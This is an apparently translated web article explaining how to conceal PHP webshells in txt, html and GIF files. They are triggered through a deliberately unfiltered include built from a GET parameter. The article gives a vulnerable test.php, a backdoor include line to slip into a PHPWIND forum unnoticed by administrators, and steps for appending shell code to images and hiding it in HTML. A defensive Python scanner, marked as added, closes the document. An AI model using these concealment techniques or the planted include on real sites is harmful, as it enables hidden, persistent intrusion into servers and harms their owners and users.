Security knowledge: how to hide PHP webshells

Source: Internet
Author: User

Recently, many of my friends have been asking me if I can hide my Trojan horse in HTML or images. In fact, inserting a Trojan horse into a PHP file is already very well concealed; if you insist on putting it in an HTML file or an image, let's look at this test report.

Note that a PHP statement placed in an image will not be executed on its own, because PHP only parses files with the php extension. Therefore, to get PHP statements hidden in an image executed, we have to use PHP's file-inclusion functions such as include and require.

You may remember the articles from the past few days about hiding Trojans in pictures. That is, an include("x.gif") statement is used in a PHP file to call the Trojan statement hidden in the image. The statements in ASP are similar. It seems very concealed, but calling an image directly looks suspicious to anyone who knows a little PHP. And because it is difficult to pass parameters through GET in the URL, the inserted Trojan cannot be put to full use.

The include function is used very frequently in PHP, so it causes many security problems. For example, the PHPWIND1.36 vulnerability is caused by not filtering the variable that follows include. We can therefore construct a similar statement and insert it into a PHP file, and then hide the Trojan in an image or HTML file, which is more concealed. For example, insert the following statement in the PHPWIND forum: <? @include 'includ/' . $PHPWIND_ROOT; ?> Generally, the administrator will not notice it.

With the include function, we can hide the PHP Trojan in many types of files, such as txt, html, and image files. Because txt, html, and image files are the most common in forums and document systems, we will test them in sequence.

First, create a PHP file test.php with the following content:

<?php
// Test script: the include path is built from the unfiltered "test" GET parameter.
$test = $_GET['test'];

@include 'test/' . $test;

?>

TXT files are generally instruction files, so we can put a Trojan in the description file of a directory. Create a TXT file t.txt and paste the script into it. Then access hxxp://localhost/test.php?test=../t.txt. If you see the content of t.txt, it works. Then, in lanker's mini PHP backdoor client, enter hxxp://localhost/test.php?test=../t.txt as the Trojan address and cmd as the password. You can see the returned results.

HTML files are generally template files. To have the Trojan inserted into an HTML file called and executed without being displayed, we can, for example, add a text box with the hidden attribute to the HTML file. Then use the same method as above. The returned results of execution can generally be viewed in the page source. For example, use the function for viewing the program directory and then view the source: the directory C:\Uniserver2_7s\www\test is displayed.

Next, let's talk about image files. The most poisonous trick is to hide Trojans in images. You can edit an image directly and insert the statement at the end of the image.

In testing, the image is generally not affected. Add the client Trojan address in the same way.

When we view the PHP environment variables, the result returned is the original image.

This may differ from the expected result. In fact, the command has been run, but the returned results are not visible: because this is a real GIF file, the returned results are not displayed. To verify whether the command is actually executed, we run the file upload command. As expected, the file is successfully uploaded to the server. The advantage of such forgery is its concealment. The disadvantage, needless to say, is that there is no echo. If you want to see the returned results, open Notepad and forge a fake image file.
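
A defender's check for the three hiding places described above, as an added example that is not part of the original article: it flags PHP open tags in txt, html and image files, a GIF that is malformed or has bytes appended after its trailer, and include/require statements whose path contains a variable. The function names, finding labels and sample GIF bytes are constructed for illustration.

```python
import re

# Heuristic PHP open tags: "<?php", "<?=", or short "<?" followed by whitespace.
PHP_TAG = re.compile(rb"<\?(?:php\b|=|\s)", re.I)
# include/require statement whose argument contains a variable.
DYNAMIC_INCLUDE = re.compile(rb"\b(?:include|require)(?:_once)?\b[^;]*\$\w+", re.I)
HIDING_EXTS = (".txt", ".html", ".htm", ".gif", ".jpg", ".jpeg", ".png")
# Constructed sample: a minimal valid 1x1 GIF (35 bytes, ends with trailer 0x3B).
CLEAN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
             b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b")


def color_table_bytes(flags):
    """Size in bytes of a GIF color table described by a packed flags byte."""
    return 3 * 2 ** ((flags & 7) + 1) if flags & 0x80 else 0


def gif_trailing_bytes(data):
    """Walk the GIF block structure; return bytes after the trailer, None if malformed."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return None
    pos = 13 + color_table_bytes(data[10])    # header + screen descriptor + global table
    try:
        while data[pos] != 0x3B:              # 0x3B is the trailer: the image ends here
            if data[pos] == 0x21:             # extension: introducer + label
                pos += 2
            elif data[pos] == 0x2C:           # image descriptor, local table, LZW size byte
                pos += 10 + color_table_bytes(data[pos + 9]) + 1
            else:
                return None
            while data[pos] != 0:             # skip length-prefixed data sub-blocks
                pos += data[pos] + 1
            pos += 1                          # sub-block terminator
        return data[pos + 1:]
    except IndexError:
        return None


def scan(name, data):
    """Return sorted finding labels for one file (name plus raw bytes)."""
    found, lower = set(), name.lower()
    if lower.endswith(HIDING_EXTS) and PHP_TAG.search(data):
        found.add("php-tag-in-non-php-file")
    if lower.endswith(".gif") and gif_trailing_bytes(data) != b"":
        found.add("gif-trailing-or-malformed")
    if lower.endswith(".php") and DYNAMIC_INCLUDE.search(data):
        found.add("include-with-variable")
    return sorted(found)
```

A finding is a lead for review rather than proof: legitimate code also includes variable paths, and the short-tag pattern can match by chance in binary data.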
